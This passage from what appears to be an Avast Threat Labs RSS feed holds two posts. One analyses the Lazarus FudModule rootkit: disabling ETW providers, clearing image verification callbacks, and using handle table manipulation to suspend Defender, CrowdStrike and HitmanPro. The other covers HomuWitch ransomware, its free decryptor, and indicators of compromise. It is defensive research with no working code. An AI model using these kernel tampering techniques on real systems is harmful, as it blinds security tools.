  2700. <p>With a pointer to <code>_ETW_GUID_ENTRY</code> corresponding to a GUID of interest, FudModule proceeds to clear <code>_ETW_GUID_ENTRY.ProviderEnableInfo.IsEnabled</code>. The purpose of this modification seems self-explanatory: FudModule is trying to disable the ETW provider. To better understand how this works, let’s examine <code>nt!EtwEventEnabled</code> (see the decompiled code below). This is a routine that often serves as an <code>if</code> condition before <code>nt!EtwWrite</code> (or <code>nt!EtwWriteEx</code>) gets called.&nbsp;&nbsp;</p>
  2701.  
  2702.  
  2703.  
  2704. <p>Looking at the decompilation, there are two <code>return 1</code> statements. Setting <code>ProviderEnableInfo.IsEnabled</code> to zero ensures that the first one is never reached. However, the second <code>return</code> statement could still potentially execute. To make sure this doesn’t happen, the rootkit also iterates over all <code>_ETW_REG_ENTRY</code> structures from the <code>_ETW_GUID_ENTRY.RegListHead</code> linked list. For each of them, it makes a single doubleword write to zero out four masks, namely <code>EnableMask</code>, <code>GroupEnableMask</code>, <code>HostEnableMask</code>, and <code>HostGroupEnableMask</code> (or only <code>EnableMask</code> and <code>GroupEnableMask</code> on older builds, where the latter two masks were not yet introduced).&nbsp;&nbsp;</p>
  2705.  
  2706.  
  2707. <div class="wp-block-image">
  2708. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="610" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/EtwEventEnabled-2-1024x610.png" alt="" class="wp-image-8208" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/EtwEventEnabled-2-1024x610.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/EtwEventEnabled-2-300x179.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/EtwEventEnabled-2-768x457.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/EtwEventEnabled-2-1536x915.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/EtwEventEnabled-2.png 1610w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Decompilation of <code>nt!EtwEventEnabled</code>. After the rootkit has finished its job, this routine will always return <code>false</code> for events related to the targeted GUIDs. This is because the rootkit cleared both <code>_ETW_GUID_ENTRY.ProviderEnableInfo.IsEnabled</code> and <code>_ETW_REG_ENTRY.GroupEnableMask</code>, forcing the highlighted conditions to fail.&nbsp;</figcaption></figure></div>
  2709.  
  2710.  
2711. <p>Clearing these masks also has an additional effect beyond making <code>EtwEventEnabled</code> always return <code>false</code>. All four masks are also checked in <code>EtwWriteEx</code>, so this modification effectively neutralizes that routine as well: when no mask is set for a particular event registration object, execution never proceeds to the lower-level routine (<code>nt!EtwpEventWriteFull</code>) where the bulk of the actual event writing logic is implemented.&nbsp;</p>
  2712.  
  2713.  
  2714.  
  2715. <h4 class="wp-block-heading">0x100 – Image Verification Callbacks&nbsp;</h4>
  2716.  
  2717.  
  2718.  
  2719. <p>Image verification callbacks are yet another callback mechanism disrupted by FudModule. Designed similarly to process/thread/image callbacks, image verification callbacks are supposed to get invoked whenever a new driver image is loaded into kernel memory. This represents useful functionality for anti-malware software, which can leverage them to blocklist known malicious or vulnerable drivers (though there might be some problems with this blocking approach as the callbacks get invoked asynchronously). Furthermore, image verification callbacks also offer a valuable source of telemetry, providing visibility into suspicious driver load events. The callbacks can be registered using the <code>SeRegisterImageVerificationCallback</code> routine, which is publicly undocumented. As a result of this undocumented nature, the usage here is limited mainly to deep-rooted anti-malware software. For instance, Windows Defender registers a callback named <code>WdFilter!MpImageVerificationCallback</code>.&nbsp;</p>
  2720.  
  2721.  
  2722.  
  2723. <p>As the kernel internally manages image verification callbacks in a similar fashion to some of the other callbacks we already explored, the rootkit’s removal implementation will undoubtedly seem familiar. First, the rootkit resolves the <code>nt!SeRegisterImageVerificationCallback</code> routine and scans its body to locate <code>nt!ExCbSeImageVerificationDriverInfo</code>. Dereferencing this, it obtains a pointer to a <code>_CALLBACK_OBJECT</code> structure, which holds the callbacks in the <code>_CALLBACK_OBJECT.RegisteredCallbacks</code> linked list. This list consists of <code>_CALLBACK_REGISTRATION</code> structures, where the actual callback function pointer can be found in <code>_CALLBACK_REGISTRATION.CallbackFunction</code>. FudModule clears the entire list by making the <code>RegisteredCallbacks</code> head <code>LIST_ENTRY</code> point directly to itself. Additionally, it also walks the original linked list and similarly short-circuits each individual <code>_CALLBACK_REGISTRATION</code> entry in the list.&nbsp;</p>
  2724.  
  2725.  
  2726.  
  2727. <p>This rootkit technique is newly implemented in the current version of FudModule, and we can only speculate on the motivation here. It seems to be designed to help avoid detection when loading either a vulnerable or a malicious driver. However, it might be hard to understand why Lazarus should want to load an additional driver if they already have control over the kernel. It would make little sense for them to load a vulnerable driver, as they already established their kernel read/write primitive by exploiting a zero-day in a preinstalled Windows driver. Further, even if they were exploiting a vulnerable driver in the first place (as was the case in the previous version of FudModule), it would be simply too late to unlink the callback now. By the time this rootkit technique executes, the image verification callback for the vulnerable driver would have already been invoked. Therefore, we believe the most likely explanation is that the threat actors are preparing the grounds for loading some malicious driver later. Perhaps the idea is that they just want to be covered in case they decide to deploy some additional kernel-mode payload in the future.&nbsp;</p>
  2728.  
  2729.  
  2730.  
  2731. <h4 class="wp-block-heading">0x200 – Direct Attacks on Security Software&nbsp;</h4>
  2732.  
  2733.  
  2734.  
  2735. <p>The rootkit techniques we explored up to this point were all somewhat generic. Each targeted some security-related system component and, through it, indirectly interfered with all security software that relied on the component. In contrast, this final technique goes straight to the point and aims to directly disable specific security software. In particular, the targeted security solutions are AhnLab V3 Endpoint Security, Windows Defender, CrowdStrike Falcon, and HitmanPro.&nbsp;</p>
  2736.  
  2737.  
  2738.  
2739. <p>The attack starts with the rootkit obtaining the address of its own <code>_EPROCESS</code> structure. This is done using <code>NtDuplicateHandle</code> to duplicate the current process pseudohandle and then calling <code>NtQuerySystemInformation</code> to get <code>SystemExtendedHandleInformation</code>. With the extended handle information, the rootkit looks for an entry corresponding to the duplicated handle and obtains the <code>_EPROCESS</code> pointer from there. Using <code>NtQuerySystemInformation</code> to leak kernel pointers is a well-known technique that Microsoft <a href="https://windows-internals.com/kaslr-leaks-restriction/" target="_blank" rel="noreferrer noopener">aims to restrict</a> by gradually building up mitigations. However, attackers capable of enabling <code>SeDebugPrivilege</code> at high integrity levels are outside the scope of these mitigations, so FudModule can keep using this technique, even on the upcoming 24H2 builds. With the <code>_EPROCESS</code> pointer, FudModule disables mitigations by zeroing out <code>_EPROCESS.MitigationFlags</code>. Then, it also clears the <code>EnableHandleExceptions</code> flag from <code>_EPROCESS.ObjectTable.Flags</code>. We believe this is meant to increase stability in case something goes wrong later during the handle table entry manipulation technique that we will describe shortly.&nbsp;&nbsp;</p>
  2740.  
  2741.  
  2742.  
2743. <p>Regarding the specific technique used to attack the security solutions, AhnLab is handled differently than the other three targets. FudModule first checks if AhnLab is even running by traversing the <code>ActiveProcessLinks</code> linked list and looking for a process named <code>asdsvc.exe</code> (AhnLab Smart Defense Service) with <code>_EPROCESS.Token.AuthenticationId</code> set to <code>SYSTEM_LUID</code>. If such a process is found, FudModule clears its <code>_EPROCESS.Protection</code> byte, effectively toggling off PPL protection for the process. While this <code>asdsvc.exe</code> process is under usual circumstances meant to be protected at the standard <code>PsProtectedSignerAntimalware</code> level, this modification makes it just a regular non-protected process. This opens it up to further attacks from user mode, where now even other privileged, yet non-protected processes could be able to tamper with it. However, we suspect the main idea behind this technique might be to disrupt the link between AhnLab’s user-mode and kernel-mode components. By removing the service’s PPL protection, the kernel-mode component might no longer recognize it as a legitimate AhnLab component. However, this is just speculation as we didn&#8217;t test the real impact of this technique.&nbsp;</p>
  2744.  
  2745.  
  2746.  
  2747. <h6 class="wp-block-heading"><strong>Handle Table Entry Manipulation</strong>&nbsp;</h6>
  2748.  
  2749.  
  2750.  
  2751. <p>The technique employed to attack Defender, CrowdStrike, and HitmanPro is much more intriguing: FudModule attempts to suspend them using a new handle table entry manipulation technique. To better understand this technique, let’s begin with a brief <a href="https://imphash.medium.com/windows-process-internals-a-few-concepts-to-know-before-jumping-on-memory-forensics-part-5-a-2368187685e" target="_blank" rel="noreferrer noopener">background on handle tables</a>. When user-mode code interacts with kernel objects such as processes, files, or mutexes, it typically doesn’t work with the objects directly. Instead, it references them indirectly through handles. Internally, the kernel must be able to translate the handle to the corresponding object, and this is where the handle table comes in. This per-process table, available at <code>_EPROCESS.ObjectTable.TableCode</code>, serves as a mapping from handles to the underlying objects. Organized as an array, it is indexed by the integer value of the handle. Each element is of type <code>_HANDLE_TABLE_ENTRY</code> and contains two crucial pieces of information: a (compressed) pointer to the object’s header (<code>nt!_OBJECT_HEADER</code>) and access bits associated with the handle.&nbsp;</p>
  2752.  
  2753.  
  2754.  
  2755. <p>Due to this handle design, kernel object access checks are typically split into two separate logical steps. The first step happens when a process attempts to acquire a handle (such as opening a file with <code>CreateFile</code>). During this step, the current thread’s token is typically checked against the target object’s security descriptor to ensure that the thread is allowed to obtain a handle with the desired access mask. The second check takes place when a process performs an operation using an already acquired handle (such as writing to a file with <code>WriteFile</code>). This typically only involves verifying that the handle is powerful enough (meaning it has the right access bits) for the requested operation.&nbsp;&nbsp;</p>
  2756.  
  2757.  
  2758.  
  2759. <p>FudModule executes as a non-protected process, so it theoretically shouldn’t be able to obtain a powerful handle to a PPL-protected process such as the CrowdStrike Falcon Service. However, leveraging the kernel read/write primitive, FudModule has the ability to access the handle table directly. This allows it to craft a custom handle table entry with control over both the referenced object and the access bits. This way, it can conjure an arbitrary handle to any object, completely bypassing the check typically needed for handle acquisition. What’s more, if it sets the handle’s access bits appropriately, it will also satisfy the subsequent handle checks when performing its desired operations.&nbsp;</p>
  2760.  
  2761.  
  2762.  
  2763. <p>To prepare for the handle table entry manipulation technique, FudModule creates a dummy thread that just puts itself to sleep immediately. The thread itself is not important. What is important is that by calling <code>CreateThread</code>, the rootkit just obtained a thread handle with <code>THREAD_ALL_ACCESS</code> rights. This handle is the one that will have its handle table entry manipulated. Since it already has very powerful access bits, the rootkit will not even have to touch its <code>_HANDLE_TABLE_ENTRY.GrantedAccessBits</code>. All it needs to do is overwrite <code>_HANDLE_TABLE_ENTRY.ObjectPointerBits</code> to redirect the handle to an arbitrary object of its choice. This will make the handle reference that object and enable the rootkit to perform privileged operations on it. Note that <code>ObjectPointerBits</code> is not the whole pointer to the object: it only represents 44 bits of the 64-bit pointer. But since the <code>_OBJECT_HEADER</code> pointed to by <code>ObjectPointerBits</code> is guaranteed to be aligned (meaning the least significant four bits must be zero) and in kernel address space (meaning the most significant sixteen bits must be <code>0xFFFF</code>), the remaining 20 bits can be easily inferred.&nbsp;</p>
  2764.  
  2765.  
  2766. <div class="wp-block-image">
  2767. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="505" height="251" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/sleep_thread.png" alt="" class="wp-image-8209" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/sleep_thread.png 505w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/sleep_thread-300x149.png 300w" sizes="(max-width: 505px) 100vw, 505px" /><figcaption class="wp-element-caption">A dummy thread whose handle will be the subject of handle table entry manipulation.&nbsp;</figcaption></figure></div>
  2768.  
  2769.  
2770. <p>The specific processes targeted by this technique are <code>MsSense.exe</code>, <code>MsMpEng.exe</code>, <code>CSFalconService.exe</code>, and <code>hmpalert.exe</code>. FudModule first finds their respective <code>_EPROCESS</code> structures, employing the same algorithm as it did to find the AhnLab service. Then, it performs a sanity check to ensure that the dummy thread handle is not too high by comparing it with <code>_EPROCESS.ObjectTable.NextHandleNeedingPool</code> (which holds information on the maximum possible handle value given the current handle table allocation size). With the sanity check satisfied, FudModule accesses the handle table itself (<code>_EPROCESS.ObjectTable.TableCode</code>) and modifies the dummy thread’s <code>_HANDLE_TABLE_ENTRY</code> so that it points to the <code>_OBJECT_HEADER</code> of the target <code>_EPROCESS</code>. Finally, the rootkit uses the redirected handle to call <code>NtSuspendProcess</code>, which will suspend the targeted process.&nbsp;&nbsp;</p>
  2771.  
  2772.  
  2773.  
  2774. <p>It might seem odd that the manipulated handle used to be a thread handle, but now it’s being used as a process handle. In practice, there is nothing wrong with this since the handle table itself holds no object type information. The object type is stored in <code>_OBJECT_HEADER.TypeIndex</code> so when the rootkit redirected the handle, it also effectively changed the handle object type. As for the access bits, the original <code>THREAD_ALL_ACCESS</code> gets reinterpreted in the new context as <code>PROCESS_ALL_ACCESS</code> since both constants share the same underlying value.&nbsp;</p>
  2775.  
  2776.  
  2777. <div class="wp-block-image">
  2778. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="932" height="190" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/windbg_handle_table_entry.png" alt="" class="wp-image-8210" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/windbg_handle_table_entry.png 932w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/windbg_handle_table_entry-300x61.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/windbg_handle_table_entry-768x157.png 768w" sizes="(max-width: 932px) 100vw, 932px" /><figcaption class="wp-element-caption">The manipulated dummy thread handle (<code>0x168</code>), now referencing a process object.&nbsp;</figcaption></figure></div>
  2779.  
  2780.  
2781. <p>Though suspending the target process might initially appear to be a completed job, FudModule doesn’t stop here. After sleeping for five seconds, it also attempts to iterate over all the threads in the target process, suspending them one by one. When all threads are suspended, FudModule uses <code>NtResumeProcess</code> to resume the suspended process. At this point, while the process itself is technically resumed, its individual threads remain suspended, meaning the process is still effectively in a suspended state. We can only speculate why Lazarus implemented process suspension this way, but it seems like an attempt to make the technique stealthier. After all, a suspended process is much more conspicuous than just several threads with increased suspend counts.&nbsp;</p>
  2782.  
  2783.  
  2784.  
  2785. <p>To enumerate threads, FudModule calls <code>NtQuerySystemInformation</code> with the <code>SystemExtendedHandleInformation</code> class. Iterating over the returned handle information, FudModule searches for thread handles from the target process. The owner process is checked by comparing the PID of the target process with <code>SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX.UniqueProcessId</code> and the type is checked by comparing <code>SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX.ObjectTypeIndex</code> with the thread type index, which was previously obtained using <code>NtQueryObject</code> to get <code>ObjectTypesInformation</code>. For each enumerated thread (which might include some threads multiple times, as there might be more than one open handle to the same thread), FudModule manipulates the dummy thread handle so that it points to the enumerated thread and suspends it by calling <code>SuspendThread</code> on the manipulated handle. Finally, after all threads are suspended and the process resumed, FudModule restores the manipulated handle to its original state, once again referencing the dummy sleep thread.&nbsp;</p>
  2786.  
  2787.  
  2788.  
  2789. <h2 class="wp-block-heading">Conclusion&nbsp;</h2>
  2790.  
  2791.  
  2792.  
  2793. <p>The Lazarus Group remains among the most <a href="https://attack.mitre.org/groups/G0032/" target="_blank" rel="noreferrer noopener">prolific and long-standing</a> advanced persistent threat actors. Though their signature tactics and techniques are well-recognized by now, they still occasionally manage to surprise us with an unexpected level of technical sophistication. The FudModule rootkit serves as the latest example, representing one of the most complex tools Lazarus holds in their arsenal. Recent updates examined in this blog show Lazarus’ commitment to keep actively developing this rootkit, focusing on improvements in both stealth and functionality.&nbsp;</p>
  2794.  
  2795.  
  2796.  
  2797. <p>With their admin-to-kernel zero-day now burned, Lazarus is confronted with a significant challenge. They can either discover a new zero-day exploit or revert to their old BYOVD techniques. Regardless of their choice, we will continue closely monitoring their activity, eager to see how they will cope with these new circumstances.&nbsp;</p>
  2798.  
  2799.  
  2800.  
  2801. <h4 class="wp-block-heading">Indicators of Compromise (IoCs)&nbsp;</h4>
  2802.  
  2803.  
  2804.  
  2805. <p>A YARA rule for the latest FudModule variant is available at <a href="https://github.com/avast/ioc/tree/master/FudModule#yara" target="_blank" rel="noreferrer noopener">https://github.com/avast/ioc/tree/master/FudModule#yara</a>.</p>
  2806. <p>The post <a href="https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/">Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
  2807. ]]></content:encoded>
  2808. </item>
  2809. <item>
  2810. <title>Decrypted: HomuWitch Ransomware</title>
  2811. <link>https://decoded.avast.io/threatresearch/decrypted-homuwitch-ransomware/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=decrypted-homuwitch-ransomware</link>
  2812. <dc:creator><![CDATA[Threat Research Team]]></dc:creator>
  2813. <pubDate>Tue, 20 Feb 2024 14:30:43 +0000</pubDate>
  2814. <category><![CDATA[PC]]></category>
  2815. <category><![CDATA[decryptor]]></category>
  2816. <category><![CDATA[decryptors]]></category>
  2817. <category><![CDATA[ransomware]]></category>
  2818. <guid isPermaLink="false">https://decoded.avast.io/?p=8077</guid>
  2819.  
  2820. <description><![CDATA[<p>HomuWitch is a ransomware strain that initially emerged in July 2023. Unlike the majority of current ransomware strains, HomuWitch targets end-users - individuals - rather than institutions and companies.</p>
  2821. <p>The post <a href="https://decoded.avast.io/threatresearch/decrypted-homuwitch-ransomware/">Decrypted: HomuWitch Ransomware</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
  2822. ]]></description>
  2823. <content:encoded><![CDATA[
  2824. <p>HomuWitch is a ransomware strain that initially emerged in July 2023. Unlike the majority of current ransomware strains, HomuWitch targets end-users &#8211; individuals &#8211; rather than institutions and companies. Its prevalence isn&#8217;t remarkably large, nor is the requested ransom payment amount, which has allowed the strain to stay relatively under the radar thus far.</p>
  2825.  
  2826.  
  2827.  
  2828. <p>During our investigation of the threat, we found a vulnerability, which allowed us to create a free decryption tool for all the HomuWitch victims. We are now sharing this tool publicly to help impacted individuals decrypt their files, free of charge.</p>
  2829.  
  2830.  
  2831.  
  2832. <p>Despite a decrease in HomuWitch activity recently, we will continue to closely monitor this threat.</p>
  2833.  
  2834.  
  2835.  
  2836. <p><a href="#usage">Skip to how to use the HomuWitch ransomware decryptor.</a></p>
  2837.  
  2838.  
  2839.  
  2840. <h4 class="wp-block-heading">About HomuWitch</h4>
  2841.  
  2842.  
  2843.  
  2844. <p>HomuWitch is a ransomware written in C# .NET. Its name comes from the file version information of the binary. Victims are usually infected via a SmokeLoader backdoor, masked as pirated software, which later installs a malicious dropper that executes the HomuWitch ransomware. Cases of infection are primarily found in two locations – Poland and Indonesia.</p>
  2845.  
  2846.  
  2847. <div class="wp-block-image">
  2848. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="660" height="413" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/dropper-snippet.png" alt="" class="wp-image-8095" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/dropper-snippet.png 660w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/dropper-snippet-300x188.png 300w" sizes="(max-width: 660px) 100vw, 660px" /><figcaption class="wp-element-caption"><em>Overview of the dropper responsible for HomuWitch ransomware</em></figcaption></figure></div>
  2849.  
  2850.  
  2851. <h4 class="wp-block-heading">HomuWitch Behavior</h4>
  2852.  
  2853.  
  2854.  
2855. <p>After the execution begins, drive letters are enumerated and those with a size smaller than 3,500 MB &#8211; as well as the current user’s directories for Pictures, Downloads, and Documents &#8211; are considered in the encryption process. Then, only files with specific extensions and a size of less than 55 MB are chosen to be encrypted. The list of extensions is as follows:</p>
  2856.  
  2857.  
  2858.  
  2859. <p><code>.pdf, .doc, .docx, .ppt, .pptx, .xls, .py, .rar, .zip, .7z, .txt, .mp4, .JPG, .PNG, .HEIC, .csv, .bbbbbbbbb</code></p>
  2860.  
  2861.  
  2862.  
2863. <p>HomuWitch transforms the files with a combination of the Deflate algorithm for compression and the AES-CBC algorithm for encryption, appending the <code>.homuencrypted</code> extension to the filename. Most ransomware strains perform only file encryption; HomuWitch also adds file compression. This causes the encrypted files to be smaller than the originals.</p>
  2864.  
  2865.  
  2866. <div class="wp-block-image">
  2867. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="895" height="439" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/encryption-snippet.png" alt="" class="wp-image-8096" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/encryption-snippet.png 895w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/encryption-snippet-300x147.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/encryption-snippet-768x377.png 768w" sizes="(max-width: 895px) 100vw, 895px" /><figcaption class="wp-element-caption">HomuWitch file-encryption routine</figcaption></figure></div>
  2868.  
  2869.  
2870. <p>HomuWitch contains a vulnerability in its encryption process that allows victims to retrieve all their files without paying the ransom. New or previously unknown samples may use a different encryption scheme, so they may not be decryptable without further analysis.</p>
  2871.  
  2872.  
  2873.  
2874. <p>HomuWitch also uses command-and-control (CnC) infrastructure for its operation, mostly located in Europe. Before encryption, HomuWitch sends the following personal information to its CnC servers:</p>
  2875.  
  2876.  
  2877.  
  2878. <p><code>Computer name, Country code, Keyboard layout, Device ID</code></p>
  2879.  
  2880.  
  2881. <div class="wp-block-image">
  2882. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="527" height="231" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/servers-snippet.png" alt="" class="wp-image-8097" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/servers-snippet.png 527w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/servers-snippet-300x131.png 300w" sizes="(max-width: 527px) 100vw, 527px" /><figcaption class="wp-element-caption">HomuWitch CnC communication</figcaption></figure></div>
  2883.  
  2884.  
2885. <p>After encryption, a ransom note is either retrieved from the CnC server or (in some samples) is stored in the sample resources. The ransom typically varies from $25 to $70, with payment demanded in Monero cryptocurrency. Here is an example of a HomuWitch ransom note:</p>
  2886.  
  2887.  
  2888. <div class="wp-block-image">
  2889. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="925" height="486" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/ransomnote.png" alt="" class="wp-image-8098" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/ransomnote.png 925w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/ransomnote-300x158.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/ransomnote-768x404.png 768w" sizes="(max-width: 925px) 100vw, 925px" /></figure></div>
  2890.  
  2891.  
  2892. <h5 class="wp-block-heading" id="usage">How to use the Avast HomuWitch ransomware decryption tool to decrypt files encrypted by the ransomware</h5>
  2893.  
  2894.  
  2895.  
  2896. <p>Follow these steps to decrypt your files:</p>
  2897.  
  2898.  
  2899.  
  2900. <ol>
  2901. <li>Download the free decryptor <a href="https://files.avast.com/files/decryptor/avast_decryptor_homuwitch.exe">here</a>.</li>
  2902.  
  2903.  
  2904.  
  2905. <li>Run the executable file. It starts as a wizard, leading you through the configuration of the decryption process.</li>
  2906.  
  2907.  
  2908.  
  2909. <li>On the initial page, you can read the license information if you want, but you only need to click “Next”.</li>
  2910. </ol>
  2911.  
  2912.  
  2913.  
  2914. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="600" height="431" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/05.png" alt="" class="wp-image-8086" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/05.png 600w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/05-300x216.png 300w" sizes="(max-width: 600px) 100vw, 600px" /></figure>
  2915.  
  2916.  
  2917.  
  2918. <ol start="4">
  2919. <li>On the following page, select the locations you want to be searched and decrypted. By default, the list contains all local drives:</li>
  2920. </ol>
  2921.  
  2922.  
  2923.  
  2924. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="600" height="431" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/06.png" alt="" class="wp-image-8087" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/06.png 600w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/06-300x216.png 300w" sizes="(max-width: 600px) 100vw, 600px" /></figure>
  2925.  
  2926.  
  2927.  
  2928. <ol start="5">
  2929. <li>On the third page, you need to provide a file in its original form and the same file as encrypted by the HomuWitch ransomware. Enter the names of both files. If you already have the encryption password from a previous run of the decryptor, you can select the “I know the password for decrypting files” option:</li>
  2930. </ol>
  2931.  
  2932.  
  2933.  
  2934. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="600" height="431" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/07.png" alt="" class="wp-image-8088" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/07.png 600w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/07-300x216.png 300w" sizes="(max-width: 600px) 100vw, 600px" /></figure>
  2935.  
  2936.  
  2937.  
  2938. <ol start="6">
  2939. <li>The next page is where the password cracking process takes place. Click “Start” when you are ready to start the process. The password cracking process uses all known HomuWitch passwords to determine the correct one.</li>
  2940. </ol>
  2941.  
  2942.  
  2943.  
  2944. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="600" height="431" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/08.png" alt="" class="wp-image-8089" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/08.png 600w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/08-300x216.png 300w" sizes="(max-width: 600px) 100vw, 600px" /></figure>
  2945.  
  2946.  
  2947.  
  2948. <ol start="7">
  2949. <li>Once the password is found, you can proceed to decrypt all the encrypted files on your PC by clicking “Next”.</li>
  2950. </ol>
  2951.  
  2952.  
  2953.  
  2954. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="600" height="431" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/09.png" alt="" class="wp-image-8090" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/09.png 600w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/09-300x216.png 300w" sizes="(max-width: 600px) 100vw, 600px" /></figure>
  2955.  
  2956.  
  2957.  
  2958. <ol start="8">
  2959. <li>On the final page, you can opt in to back up your encrypted files. These backups may help if anything goes wrong during the decryption process. This option is on by default, which we recommend. After clicking “Decrypt”, the decryption process begins. Let the decryptor work and wait until it finishes decrypting all of your files.</li>
  2960. </ol>
  2961.  
  2962.  
  2963.  
  2964. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="600" height="431" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/10.png" alt="" class="wp-image-8091" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/10.png 600w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/10-300x216.png 300w" sizes="(max-width: 600px) 100vw, 600px" /></figure>
  2965.  
  2966.  
  2967.  
  2968. <h5 class="wp-block-heading">Indicators of Compromise (IoCs)</h5>
  2969.  
  2970.  
  2971.  
  2972. <p><strong>Samples (SHA256)</strong></p>
  2973.  
  2974.  
  2975.  
  2976. <p><code>03e4f770157c11d86d462cc4e9ebeddee3130565221700841a7239e68409accf<br>0e42c452b5795a974061712928d5005169126ad1201bd2b9490f377827528e5d<br>16c3eea8ed3a44ee22dad8e8aec0c8c6b43c23741498f11337779e6621d1fe4e<br>33dd6dfd51b79dad25357f07a8fb4da47cec010e0f8e6d164c546a18ad2a762c<br>3546b2dd517a99249ef5fd8dfd2a8fd80cb89dfdc9e38602e1f3115634789316<br>4ea00f1ffe2bbbf5476c0eb677ac75cf1a765fe5c8ce899f47eb8b344da878ed<br>6252cda4786396ebd7e9baf8ff0454d6af038aed48a7e4ec33cd9249816db2f4<br>9343a0714a0e159b1d49b591f0835398076af8c8e2da56cbb8c9b7a15c9707c8<br>bd90468f50629728d717c53cd7806ba59d6ad9377163d0d3328d6db4db6a3826<br>cd4c3db443dbfd768c59575ede3b1e26002277c109d39ea020d1bc307374e309<br>fd32a8c5cd211b057fdf3e7cc27167296c71e3fb42daa488649cdf81f58f6848</code></p>
  2977.  
  2978.  
  2979.  
  2980. <p><strong>Command-and-Control Servers</strong></p>
  2981.  
  2982.  
  2983.  
  2984. <figure class="wp-block-table"><table><thead><tr><th>IP Address</th><th>Origin</th></tr></thead><tbody><tr><td><code>78.142.0.42</code></td><td><code>US</code></td></tr><tr><td><code>79.137.207.233</code></td><td><code>Germany</code></td></tr><tr><td><code>185.216.68.97</code></td><td><code>Netherlands</code></td></tr><tr><td><code>193.164.150.225</code></td><td><code>Russia</code></td></tr></tbody></table></figure>
  2985.  
  2986.  
  2987.  
  2988. <p>IoCs are available at <a href="https://github.com/avast/ioc/tree/master/HomuWitch" target="_blank" rel="noreferrer noopener">https://github.com/avast/ioc/tree/master/HomuWitch</a></p>
  2989. <p>The post <a href="https://decoded.avast.io/threatresearch/decrypted-homuwitch-ransomware/">Decrypted: HomuWitch Ransomware</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
  2990. ]]></content:encoded>
  2991. </item>
  2992. <item>
  2993. <title>Decrypted: Rhysida Ransomware</title>
  2994. <link>https://decoded.avast.io/threatresearch/decrypted-rhysida-ransomware/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=decrypted-rhysida-ransomware</link>
  2995. <dc:creator><![CDATA[Threat Research Team]]></dc:creator>
  2996. <pubDate>Tue, 13 Feb 2024 11:44:42 +0000</pubDate>
  2997. <category><![CDATA[PC]]></category>
  2998. <category><![CDATA[decryptor]]></category>
  2999. <category><![CDATA[decryptors]]></category>
  3000. <category><![CDATA[ransomware]]></category>
  3001. <guid isPermaLink="false">https://decoded.avast.io/?p=8027</guid>
  3002.  
